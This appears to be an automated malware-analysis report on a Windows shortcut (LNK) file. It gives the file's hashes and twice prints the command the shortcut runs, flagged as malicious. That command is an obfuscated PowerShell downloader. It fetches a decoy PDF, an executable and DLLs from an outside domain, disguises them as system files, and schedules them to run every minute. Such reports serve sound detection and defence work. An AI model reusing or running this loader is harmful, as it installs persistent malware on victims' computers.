c42708354261ac78983d305d826fde53
LNK File | MD5: c42708354261ac78983d305d826fde53 | Size: 3.76 KB | application/x-ms-shortcut
|
Hash | Hash Value |
|---|---|
| MD5 | c42708354261ac78983d305d826fde53
|
| Sha1 | acdf6fa6ebcb80beb8039eb849cb473d00f1e56d
|
| Sha256 | 9b2637b8fefeedf8dca8a0ace491de05b6d937ea7463b48562cd1a0f25abb9f5
|
| Sha384 | 6f081df82daae87359ee1baa0006f0e750c0d9f13c8e9d8b9cb6b80429e15600268a224fa551055224a92dd3a98af22d
|
| Sha512 | 78b21bf0a35c0ac9cbdc1c139da75b81a32dff65373227fc8419e6b3f53954c7e7b744c0893195f5aacc630331977ae9aa2cd29539c857d77a57e58b4f892781
|
| SSDeep | 96:8orXgOL+jlcWjlcv2dN2fjlcosXSY1um3YLq:8orXgC+jVjK2dN2fjiSY1jI
|
| TLSH | 0D717B0417F54318F3B74B3EB8BFA2514576BC6CEE318A9D1160D1880CE5629E87AF2B
|
|
Name0 | Value |
|---|---|
| LNK: Command Execution | powershell.exe $ProgressPreference = 'SilentlyContinue';$a='https:';$b='C:\Users\Public';$d='paksecurity.org';iw''r $a//$d/c/wF -o $b\FAKE_CAPTCHA.pdf;s''ap''s $b\FAKE_CAPTCHA.pdf;iw''r $a//$d/i/ss -o $b\la;r''en $b\la $b\SystemSettings.exe;iw''r $a//$d/h/rZ -o $b\le;r''en $b\le $b\SystemSettings.dll;iw''r $a//$d/j/Lj -o $b\lx;r''en $b\lx $b\vcruntime140.dll;iw''r $a//$d/f/Vs -o $b\ll;r''en $b\ll $b\msvcp140.dll;iw''r $a//$d/g/yq -o $b\lb;r''en $b\lb $b\readme.DAT;c''p''i $b\FAKE_CAPTCHA.pdf -d .;&(g''cm sch*) /c''r''e''a''te /''S''c minute /''tn GoogleReport /t''r $b\SystemSettings /f;r''m *A.?n?; |
|
Name0 | Value | Location |
|---|---|---|
| LNK: Command Execution | powershell.exe $ProgressPreference = 'SilentlyContinue';$a='https:';$b='C:\Users\Public';$d='paksecurity.org';iw''r $a//$d/c/wF -o $b\FAKE_CAPTCHA.pdf;s''ap''s $b\FAKE_CAPTCHA.pdf;iw''r $a//$d/i/ss -o $b\la;r''en $b\la $b\SystemSettings.exe;iw''r $a//$d/h/rZ -o $b\le;r''en $b\le $b\SystemSettings.dll;iw''r $a//$d/j/Lj -o $b\lx;r''en $b\lx $b\vcruntime140.dll;iw''r $a//$d/f/Vs -o $b\ll;r''en $b\ll $b\msvcp140.dll;iw''r $a//$d/g/yq -o $b\lb;r''en $b\lb $b\readme.DAT;c''p''i $b\FAKE_CAPTCHA.pdf -d .;&(g''cm sch*) /c''r''e''a''te /''S''c minute /''tn GoogleReport /t''r $b\SystemSettings /f;r''m *A.?n?; Malicious |
c42708354261ac78983d305d826fde53 |